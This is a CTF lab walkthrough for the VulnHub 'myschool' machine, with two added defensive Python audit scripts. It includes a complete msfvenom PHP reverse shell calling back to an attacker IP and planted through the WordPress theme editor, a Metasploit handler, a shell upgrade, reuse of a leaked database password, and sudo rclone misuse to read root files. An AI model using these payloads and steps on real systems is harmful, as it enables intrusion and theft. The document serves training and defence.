Monday, 1 March 2021

myschool CTF

Hi friends, it has been a long time since I last wrote; that is down to lack of time, so don't worry.

This time I present the myschool CTF, from VulnHub.

Attacking machine: 192.168.1.57
Victim machine: 192.168.1.64



On port 80:



 

We have the version:

We find the exploit on Exploit-DB

We look at how the exploit is used

root@kali:~/ctfs/myschool# python3 48779.py -h
usage: 48779.py [-h] --url URL -u USERNAME -p PASSWORD -lhost IP -lport PORT

CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell

optional arguments:
  -h, --help   show this help message and exit
  --url URL    URL to admin pane </admin/login.php>
  -u USERNAME  Username
  -p PASSWORD  Password
  -lhost IP    The listen address
  -lport PORT  The listen port


nikto -host http://192.168.1.64 -output nikto.txt

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.64
+ Target Hostname:    192.168.1.64
+ Target Port:        80
+ Start Time:         2021-01-30 12:50:30 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Cookie CMSSESSIDde72be53c754 created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7921 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2021-01-30 12:51:37 (GMT1) (67 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!
root@kali:~/ctfs/myschool#


-----------------
DIRB v2.22   
By The Dark Raver
-----------------

OUTPUT_FILE: dirb
START_TIME: Sat Jan 30 18:36:31 2021
URL_BASE: http://192.168.1.64/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                         

---- Scanning URL: http://192.168.1.64/ ----
==> DIRECTORY: http://192.168.1.64/admin/                                            
==> DIRECTORY: http://192.168.1.64/assets/                                           
==> DIRECTORY: http://192.168.1.64/doc/                                              
+ http://192.168.1.64/index.php (CODE:200|SIZE:18825)                                
==> DIRECTORY: http://192.168.1.64/lib/                                              
==> DIRECTORY: http://192.168.1.64/modules/                                          
+ http://192.168.1.64/server-status (CODE:403|SIZE:277)                              
==> DIRECTORY: http://192.168.1.64/tmp/                                              
==> DIRECTORY: http://192.168.1.64/uploads/                                          
                                                                                     
---- Entering directory: http://192.168.1.64/admin/ ----
+ http://192.168.1.64/admin/index.php (CODE:302|SIZE:0)                              
==> DIRECTORY: http://192.168.1.64/admin/lang/                                       
==> DIRECTORY: http://192.168.1.64/admin/plugins/                                    
==> DIRECTORY: http://192.168.1.64/admin/templates/                                  
==> DIRECTORY: http://192.168.1.64/admin/themes/                                     
                                                                                     
---- Entering directory: http://192.168.1.64/assets/ ----
==> DIRECTORY: http://192.168.1.64/assets/configs/                                   
==> DIRECTORY: http://192.168.1.64/assets/css/                                       
==> DIRECTORY: http://192.168.1.64/assets/images/                                    
==> DIRECTORY: http://192.168.1.64/assets/plugins/                                   
==> DIRECTORY: http://192.168.1.64/assets/templates/                                 
                                                                                     
---- Entering directory: http://192.168.1.64/doc/ ----
+ http://192.168.1.64/doc/admin.cgi (CODE:403|SIZE:277)                              
+ http://192.168.1.64/doc/admin.php (CODE:403|SIZE:277)                              
+ http://192.168.1.64/doc/admin.pl (CODE:403|SIZE:277)                               
+ http://192.168.1.64/doc/AT-admin.cgi (CODE:403|SIZE:277)                           
+ http://192.168.1.64/doc/cachemgr.cgi (CODE:403|SIZE:277)                           
+ http://192.168.1.64/doc/index.html (CODE:200|SIZE:24)                              
+ http://192.168.1.64/doc/index.php (CODE:403|SIZE:277)                              
+ http://192.168.1.64/doc/info.php (CODE:403|SIZE:277)                               
+ http://192.168.1.64/doc/phpinfo.php (CODE:403|SIZE:277)                            
+ http://192.168.1.64/doc/robots.txt (CODE:403|SIZE:277)                             
+ http://192.168.1.64/doc/xmlrpc.php (CODE:403|SIZE:277)                             
+ http://192.168.1.64/doc/xmlrpc_server.php (CODE:403|SIZE:277)                      
                                                                                     
---- Entering directory: http://192.168.1.64/lib/ ----
==> DIRECTORY: http://192.168.1.64/lib/assets/                                       
==> DIRECTORY: http://192.168.1.64/lib/classes/                                      
+ http://192.168.1.64/lib/index.html (CODE:200|SIZE:24)                              
==> DIRECTORY: http://192.168.1.64/lib/jquery/                                       
==> DIRECTORY: http://192.168.1.64/lib/lang/                                         
==> DIRECTORY: http://192.168.1.64/lib/phpmailer/                                    
==> DIRECTORY: http://192.168.1.64/lib/plugins/                                      
==> DIRECTORY: http://192.168.1.64/lib/smarty/                                       
==> DIRECTORY: http://192.168.1.64/lib/tasks/                                        
                                                                                     
---- Entering directory: http://192.168.1.64/modules/ ----
==> DIRECTORY: http://192.168.1.64/modules/News/                                     
==> DIRECTORY: http://192.168.1.64/modules/Search/                                   
                                                                                     
---- Entering directory: http://192.168.1.64/tmp/ ----
==> DIRECTORY: http://192.168.1.64/tmp/cache/                                        
==> DIRECTORY: http://192.168.1.64/tmp/templates_c/                                  
                                                                                     
---- Entering directory: http://192.168.1.64/uploads/ ----
==> DIRECTORY: http://192.168.1.64/uploads/images/                                   
+ http://192.168.1.64/uploads/index.html (CODE:200|SIZE:0)                           
                                                                                     
---- Entering directory: http://192.168.1.64/admin/lang/ ----
+ http://192.168.1.64/admin/lang/index.html (CODE:200|SIZE:24)                       
                                                                                     
---- Entering directory: http://192.168.1.64/admin/plugins/ ----
+ http://192.168.1.64/admin/plugins/index.html (CODE:200|SIZE:24)                    
                                                                                     
---- Entering directory: http://192.168.1.64/admin/templates/ ----
+ http://192.168.1.64/admin/templates/index.html (CODE:200|SIZE:24)                  
                                                                                     
---- Entering directory: http://192.168.1.64/admin/themes/ ----
                                                                                     
---- Entering directory: http://192.168.1.64/assets/configs/ ----
+ http://192.168.1.64/assets/configs/index.html (CODE:200|SIZE:0)                    
                                                                                     
---- Entering directory: http://192.168.1.64/assets/css/ ----
+ http://192.168.1.64/assets/css/index.html (CODE:200|SIZE:0)                        
                                                                                     
---- Entering directory: http://192.168.1.64/assets/images/ ----
+ http://192.168.1.64/assets/images/index.html (CODE:200|SIZE:0)                     
                                                                                     
---- Entering directory: http://192.168.1.64/assets/plugins/ ----
+ http://192.168.1.64/assets/plugins/index.html (CODE:200|SIZE:0)                    
                                                                                     
---- Entering directory: http://192.168.1.64/assets/templates/ ----
+ http://192.168.1.64/assets/templates/index.html (CODE:200|SIZE:0)                  
                                                                                     
---- Entering directory: http://192.168.1.64/lib/assets/ ----
==> DIRECTORY: http://192.168.1.64/lib/assets/images/                                
==> DIRECTORY: http://192.168.1.64/lib/assets/templates/                             
                                                                                     
---- Entering directory: http://192.168.1.64/lib/classes/ ----
+ http://192.168.1.64/lib/classes/index.html (CODE:200|SIZE:24)                      
==> DIRECTORY: http://192.168.1.64/lib/classes/internal/                             
                                                                                     
---- Entering directory: http://192.168.1.64/lib/jquery/ ----
==> DIRECTORY: http://192.168.1.64/lib/jquery/css/                                   
==> DIRECTORY: http://192.168.1.64/lib/jquery/js/                                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/lang/ ----
==> DIRECTORY: http://192.168.1.64/lib/lang/help/                                    
==> DIRECTORY: http://192.168.1.64/lib/lang/tags/                                    
==> DIRECTORY: http://192.168.1.64/lib/lang/tasks/                                   
                                                                                     
---- Entering directory: http://192.168.1.64/lib/phpmailer/ ----
+ http://192.168.1.64/lib/phpmailer/index.html (CODE:200|SIZE:24)                    
==> DIRECTORY: http://192.168.1.64/lib/phpmailer/language/                           
+ http://192.168.1.64/lib/phpmailer/LICENSE (CODE:200|SIZE:26421)                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/plugins/ ----
+ http://192.168.1.64/lib/plugins/index.html (CODE:200|SIZE:24)                      
                                                                                     
---- Entering directory: http://192.168.1.64/lib/smarty/ ----
+ http://192.168.1.64/lib/smarty/index.html (CODE:200|SIZE:24)                       
==> DIRECTORY: http://192.168.1.64/lib/smarty/plugins/                               
                                                                                     
---- Entering directory: http://192.168.1.64/lib/tasks/ ----
+ http://192.168.1.64/lib/tasks/index.html (CODE:200|SIZE:24)                        
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/ ----
==> DIRECTORY: http://192.168.1.64/modules/News/doc/                                 
==> DIRECTORY: http://192.168.1.64/modules/News/images/                              
+ http://192.168.1.64/modules/News/index.html (CODE:200|SIZE:24)                     
==> DIRECTORY: http://192.168.1.64/modules/News/lang/                                
==> DIRECTORY: http://192.168.1.64/modules/News/lib/                                 
==> DIRECTORY: http://192.168.1.64/modules/News/templates/                           
                                                                                     
---- Entering directory: http://192.168.1.64/modules/Search/ ----
==> DIRECTORY: http://192.168.1.64/modules/Search/images/                            
+ http://192.168.1.64/modules/Search/index.html (CODE:200|SIZE:24)                   
==> DIRECTORY: http://192.168.1.64/modules/Search/lang/                              
==> DIRECTORY: http://192.168.1.64/modules/Search/templates/                         
                                                                                     
---- Entering directory: http://192.168.1.64/tmp/cache/ ----
+ http://192.168.1.64/tmp/cache/index.html (CODE:200|SIZE:0)                         
                                                                                     
---- Entering directory: http://192.168.1.64/tmp/templates_c/ ----
+ http://192.168.1.64/tmp/templates_c/index.html (CODE:200|SIZE:0)                   
                                                                                     
---- Entering directory: http://192.168.1.64/uploads/images/ ----
+ http://192.168.1.64/uploads/images/index.html (CODE:200|SIZE:0)                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/assets/images/ ----
+ http://192.168.1.64/lib/assets/images/index.html (CODE:200|SIZE:24)                
                                                                                     
---- Entering directory: http://192.168.1.64/lib/assets/templates/ ----
+ http://192.168.1.64/lib/assets/templates/index.html (CODE:200|SIZE:24)             
                                                                                     
---- Entering directory: http://192.168.1.64/lib/classes/internal/ ----
+ http://192.168.1.64/lib/classes/internal/index.html (CODE:200|SIZE:24)             
                                                                                     
---- Entering directory: http://192.168.1.64/lib/jquery/css/ ----
                                                                                     
---- Entering directory: http://192.168.1.64/lib/jquery/js/ ----
+ http://192.168.1.64/lib/jquery/js/index.html (CODE:200|SIZE:24)                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/lang/help/ ----
+ http://192.168.1.64/lib/lang/help/index.html (CODE:200|SIZE:24)                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/lang/tags/ ----
+ http://192.168.1.64/lib/lang/tags/index.html (CODE:200|SIZE:24)                    
                                                                                     
---- Entering directory: http://192.168.1.64/lib/lang/tasks/ ----
+ http://192.168.1.64/lib/lang/tasks/index.html (CODE:200|SIZE:24)                   
                                                                                     
---- Entering directory: http://192.168.1.64/lib/phpmailer/language/ ----
+ http://192.168.1.64/lib/phpmailer/language/index.html (CODE:200|SIZE:24)           
                                                                                     
---- Entering directory: http://192.168.1.64/lib/smarty/plugins/ ----
+ http://192.168.1.64/lib/smarty/plugins/index.html (CODE:200|SIZE:24)               
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/doc/ ----
+ http://192.168.1.64/modules/News/doc/index.html (CODE:200|SIZE:24)                 
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/images/ ----
+ http://192.168.1.64/modules/News/images/index.html (CODE:200|SIZE:24)              
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/lang/ ----
+ http://192.168.1.64/modules/News/lang/index.html (CODE:200|SIZE:24)                
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/lib/ ----
+ http://192.168.1.64/modules/News/lib/index.html (CODE:200|SIZE:24)                 
                                                                                     
---- Entering directory: http://192.168.1.64/modules/News/templates/ ----
+ http://192.168.1.64/modules/News/templates/index.html (CODE:200|SIZE:24)           
                                                                                     
---- Entering directory: http://192.168.1.64/modules/Search/images/ ----
+ http://192.168.1.64/modules/Search/images/index.html (CODE:200|SIZE:24)            
                                                                                     
---- Entering directory: http://192.168.1.64/modules/Search/lang/ ----
+ http://192.168.1.64/modules/Search/lang/index.html (CODE:200|SIZE:24)              
                                                                                     
---- Entering directory: http://192.168.1.64/modules/Search/templates/ ----
+ http://192.168.1.64/modules/Search/templates/index.html (CODE:200|SIZE:24)         
                                                                                     
-----------------
END_TIME: Sat Jan 30 18:39:05 2021
DOWNLOADED: 221376 - FOUND: 53
root@kali:~/ctfs/myschool#

In addition, the page http://192.168.1.64/index.php?page=menu-manager-2 gives us a username:

On port 8080






We create a database in MySQL
root@kali:~/ctfs/myschool# service mysql start

root@kali:~/ctfs/myschool# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 14
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

We create a database:

MariaDB [(none)]> create database wpress;
Query OK, 1 row affected (0.000 sec)

We create a user:

MariaDB [(none)]> create user 'wp-user'@'192.168.1.64' identified by 'contrasena1234';
Query OK, 0 rows affected (0.000 sec)

We grant it all privileges (grant option lets it grant privileges to other users itself)
MariaDB [(none)]> grant all on wpress.* to 'wp-user'@'192.168.1.64' with grant option;
Query OK, 0 rows affected (0.000 sec)

We reload the privileges:
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.001 sec)

We exit:
MariaDB [(none)]> exit

Now we edit

/etc/mysql/mariadb.conf.d/50-server.cnf
and change bind-address 127.0.0.1 to bind-address 0.0.0.0 so that our database accepts connections from any address.

We save and exit.

We restart MySQL

service mysql restart

And in the web form we enter:

Database name: wpress
Username: wp-user
Password: contrasena1234
Database host: 192.168.1.57

We leave the table prefix unchanged.





In the next window we enter, for example:


And WordPress is now installed on the victim, but with its database on our machine.

Once we log in with the username and password, the dashboard finally appears:






We create a payload

root@kali:~/ctfs/myschool# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.57 LPORT=7777 -f raw > shell.php

We run:

root@kali:~/ctfs/myschool# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.1.57'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();root@kali:~/ctfs/myschool#                                                          

This is the code we will use, but in the following form:

<?php /**/ error_reporting(0); $ip = '192.168.1.57'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>                                      

Next, we start Metasploit

msfconsole

And we start listening

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:7777
msf5 exploit(multi/handler) >

We go to Appearance → Theme Editor



We select index.php and paste our code


We click Update File.

And if we open http://192.168.1.64:8080/index.php in another browser tab

we get in our console:

[*] Meterpreter session 1 opened (192.168.1.57:7777 -> 192.168.1.64:53332) at 2021-02-20 18:56:55 +0100
[*] Sending stage (38288 bytes) to 192.168.1.64
[*] Meterpreter session 2 opened (192.168.1.57:7777 -> 192.168.1.64:53338) at 2021-02-20 18:58:17 +0100

msf5 exploit(multi/handler) >
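
Seen from the defender's side, this foothold needed two things: a WordPress tree whose installer had never been completed, and the built-in theme editor. The following check is an added example, not part of the original write-up; the function names, the allow-list of database hosts and the three sample trees are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# define('NAME', value); where value is a quoted string or a bare literal.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<name>\w+)['"]\s*,\s*"""
    r"""(?P<value>'[^']*'|"[^"]*"|[\w.]+)\s*\)\s*;"""
)


def parse_defines(php_source):
    """Return {constant: value} for define() calls on non-comment lines.

    Line-based on purpose: lines starting with //, #, /* or * are skipped,
    so a define() hidden inside an unusual multi-line comment may be misread.
    """
    defines = {}
    for line in php_source.splitlines():
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue
        for m in DEFINE_RE.finditer(line):
            defines[m.group("name")] = m.group("value").strip("'\"")
    return defines


def db_host_only(db_host):
    """Strip an optional :port or :/socket suffix from DB_HOST."""
    if db_host.startswith("["):                  # [IPv6]:port
        return db_host[1:].split("]", 1)[0]
    return db_host.split(":", 1)[0]


def audit_wordpress(root, allowed_db_hosts=("localhost", "127.0.0.1")):
    """Return a list of (finding_id, detail) tuples for one WordPress tree."""
    findings = []
    config = Path(root) / "wp-config.php"
    if not config.is_file():
        # No configuration yet: the setup wizard is reachable by anyone.
        if (Path(root) / "wp-admin" / "setup-config.php").is_file():
            findings.append(("installer-exposed",
                             "no wp-config.php: the first visitor chooses the "
                             "database server and the admin account"))
        return findings
    defines = parse_defines(config.read_text(errors="replace"))
    host = db_host_only(defines.get("DB_HOST", ""))
    if host and host not in allowed_db_hosts:
        findings.append(("unexpected-db-host", f"DB_HOST points at {host}"))
    edit_off = defines.get("DISALLOW_FILE_EDIT", "").lower() == "true"
    mods_off = defines.get("DISALLOW_FILE_MODS", "").lower() == "true"
    if not (edit_off or mods_off):
        findings.append(("theme-editor-enabled",
                         "an admin login can rewrite theme PHP files"))
    return findings


def demo():
    """Run the audit over three constructed sample trees."""
    samples = {
        # Unpacked but never installed.
        "fresh": None,
        # Installed against a remote database, editor left on.
        "remote_db": "<?php\n// define('DB_HOST', 'localhost');\n"
                     "define( 'DB_NAME', 'wpress' );\n"
                     "define( 'DB_HOST', '192.168.1.57' );\n",
        # Local database, file editor disabled.
        "hardened": "<?php\ndefine( 'DB_HOST', 'localhost:3306' );\n"
                    "define( 'DISALLOW_FILE_EDIT', true );\n",
    }
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, config in samples.items():
            root = Path(tmp) / name
            (root / "wp-admin").mkdir(parents=True)
            (root / "wp-admin" / "setup-config.php").write_text("<?php\n")
            if config is not None:
                (root / "wp-config.php").write_text(config)
            results[name] = audit_wordpress(root)
    return results


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "clean")
```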

If we go to /home, we can see that there is a user armour, who has the following files:

meterpreter > ls
Listing: /home/armour
=====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2020-11-02 11:16:17 +0100  .bash_history
100644/rw-r--r--  220   fil   2020-10-27 16:47:42 +0100  .bash_logout
100644/rw-r--r--  3526  fil   2020-10-27 16:47:42 +0100  .bashrc
40755/rwxr-xr-x   4096  dir   2020-11-02 10:35:33 +0100  .config
40700/rwx------   4096  dir   2020-10-28 15:23:30 +0100  .gnupg
100644/rw-r--r--  807   fil   2020-10-27 16:47:42 +0100  .profile
40700/rwx------   4096  dir   2020-10-31 14:13:25 +0100  .ssh
100600/rw-------  736   fil   2020-11-02 11:00:03 +0100  .viminfo
100644/rw-r--r--  33    fil   2020-11-02 11:00:02 +0100  user.txt

meterpreter > cat user.txt
628435356e49f976bab2c04948d22fe4
meterpreter >

What is more, we can view the contents of user.txt
With hash-identifier we check the hash type

root@kali:~/ctfs/myschool# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 628435356e49f976bab2c04948d22fe4

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))


OK, it is MD5. We go to https://www.md5online.org/ and ask it to reverse the hash, and we get:


We open a shell

meterpreter > shell
Process 989 created.
Channel 1 created.

We spawn bash
python -c 'import pty; pty.spawn("/bin/bash")'

www-data@myschool:/home/armour$



We find:
www-data@myschool:/var/www/html/cmsms$ cat config.php
cat config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'root';
$config['db_password'] = 'SW)#$of4-9056d';
$config['db_name'] = 'cmsms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'America/New_York';
?>www-data@myschool:/var/www/html/cmsms$

So there we go:
su armour
Password: SW)#$of4-9056d

armour@myschool:/var/www/html/cmsms$

With sudo -l we can see which programs we are allowed to run as root

armour@myschool:/var/www/html/wordpress$ sudo -l
sudo -l
Matching Defaults entries for armour on myschool:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User armour may run the following commands on myschool:
    (ALL : ALL) NOPASSWD: /usr/bin/rclone
armour@myschool:/var/www/html/wordpress$

We are allowed to run rclone

armour@myschool:/var/www/html/wordpress$ rclone
rclone
Usage:
  rclone [flags]
  rclone [command]

Available Commands:
  about           Get quota information from the remote.
  authorize       Remote authorization.
  cachestats      Print cache stats for a remote
  cat             Concatenates any files and sends them to stdout.
  check           Checks the files in the source and destination match.
  cleanup         Clean up the remote if possible
  config          Enter an interactive configuration session.
  copy            Copy files from source to dest, skipping already copied
  copyto          Copy files from source to dest, skipping already copied
  copyurl         Copy url content to dest.
  cryptcheck      Cryptcheck checks the integrity of a crypted remote.
  cryptdecode     Cryptdecode returns unencrypted file names.
  dbhashsum       Produces a Dropbox hash file for all the objects in the path.
  dedupe          Interactively find duplicate files and delete/rename them.
  delete          Remove the contents of path.
  deletefile      Remove a single file from remote.
  genautocomplete Output completion script for a given shell.
  gendocs         Output markdown docs for rclone to the directory supplied.
  hashsum         Produces an hashsum file for all the objects in the path.
  help            Show help for rclone commands, flags and backends.
  link            Generate public link to file/folder.
  listremotes     List all the remotes in the config file.
  ls              List the objects in the path with size and path.
  lsd             List all directories/containers/buckets in the path.
  lsf             List directories and objects in remote:path formatted for parsing
  lsjson          List directories and objects in the path in JSON format.
  lsl             List the objects in path with modification time, size and path.
  md5sum          Produces an md5sum file for all the objects in the path.
  mkdir           Make the path if it doesn't already exist.
  mount           Mount the remote as file system on a mountpoint.
  move            Move files from source to dest.
  moveto          Move file or directory from source to dest.
  ncdu            Explore a remote with a text based user interface.
  obscure         Obscure password for use in the rclone.conf
  purge           Remove the path and all of its contents.
  rc              Run a command against a running rclone.
  rcat            Copies standard input to file on remote.
  rcd             Run rclone listening to remote control commands only.
  rmdir           Remove the path if empty.
  rmdirs          Remove empty directories under the path.
  serve           Serve a remote over a protocol.
  settier         Changes storage class/tier of objects in remote.
  sha1sum         Produces an sha1sum file for all the objects in the path.
  size            Prints the total size and number of objects in remote:path.
  sync            Make source and dest identical, modifying destination only.
  touch           Create new file or change file modification time.
  tree            List the contents of the remote in a tree like fashion.
  version         Show the version number.

Use "rclone [command] --help" for more information about a command.
Use "rclone help flags" for to see the global flags.
Use "rclone help backends" for a list of supported services.
armour@myschool:/var/www/html/wordpress$

We see that rclone can do several things

Let's see what is inside the /root/ directory

armour@myschool:/var/www/html/wordpress$ sudo rclone ls /root/
sudo rclone ls /root/
        5 .bash_history
      570 .bashrc
      100 .mysql_history
      148 .profile
    10459 .viminfo
      168 .wget-hsts
       46 proof.txt
       96 .config/rclone/rclone.conf
armour@myschool:/var/www/html/wordpress$

Let's see what proof.txt says

armour@myschool:/var/www/html/wordpress$ sudo rclone cat /root/proof.txt
sudo rclone cat /root/proof.txt
Best of Luck
02a4f62865fddf48345f51ffdbe073ec
armour@myschool:/var/www/html/wordpress$

And there we have the flag.
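
The root flag was readable only because of the sudoers entry that sudo -l printed. As an added example (not part of the original write-up), this parser flags such entries in sudo -l output; the second sample, the Rule class and the file_tools list are assumptions made for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Output of `sudo -l` as shown in the walkthrough above.
PAGE_SAMPLE = r"""Matching Defaults entries for armour on myschool:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User armour may run the following commands on myschool:
    (ALL : ALL) NOPASSWD: /usr/bin/rclone
"""

# Constructed sample: password required and arguments pinned.
HARDENED_SAMPLE = """User deploy may run the following commands on web01:
    (root) /usr/bin/systemctl restart apache2
"""

ENTRY_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^(?P<tag>[A-Z_]+):\s*")


@dataclass
class Rule:
    runas_user: str
    tags: List[str]
    command: str
    args: Optional[str]   # None: no arguments listed, so any are accepted
    reasons: List[str] = field(default_factory=list)


def parse_sudo_l(text: str) -> List[Rule]:
    """Turn the command section of `sudo -l` output into Rule objects."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True        # everything before this is Defaults
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        rest, tags = m.group("rest"), []
        while (t := TAG_RE.match(rest)):          # NOPASSWD:, SETENV:, ...
            tags.append(t.group("tag"))
            rest = rest[t.end():]
        for cmd in re.split(r"(?<!\\),\s*", rest):  # "\," is an escaped comma
            path, _, args = cmd.strip().partition(" ")
            rules.append(Rule(runas_user, tags, path, args.strip() or None))
    return rules


def evaluate(rule: Rule, file_tools=("rclone",)) -> Rule:
    """Attach the reasons a rule deserves review; file_tools is site-defined."""
    if rule.runas_user not in ("ALL", "root"):
        return rule
    name = rule.command.rsplit("/", 1)[-1]
    if "NOPASSWD" in rule.tags:
        rule.reasons.append("runs as root without re-authentication")
    if rule.args is None:
        rule.reasons.append("no argument list: every subcommand and path is allowed")
        if name in file_tools:
            rule.reasons.append(f"{name} can list and read any path, including /root")
    return rule


def audit(text: str) -> List[Rule]:
    """Return only the rules that collected at least one reason."""
    return [r for r in map(evaluate, parse_sudo_l(text)) if r.reasons]


if __name__ == "__main__":
    for rule in audit(PAGE_SAMPLE):
        print(rule.command, "as", rule.runas_user)
        for reason in rule.reasons:
            print("  -", reason)
```

Pinning the arguments in sudoers, or replacing the entry with a root-owned wrapper script that calls rclone with fixed paths, removes the second and third reasons.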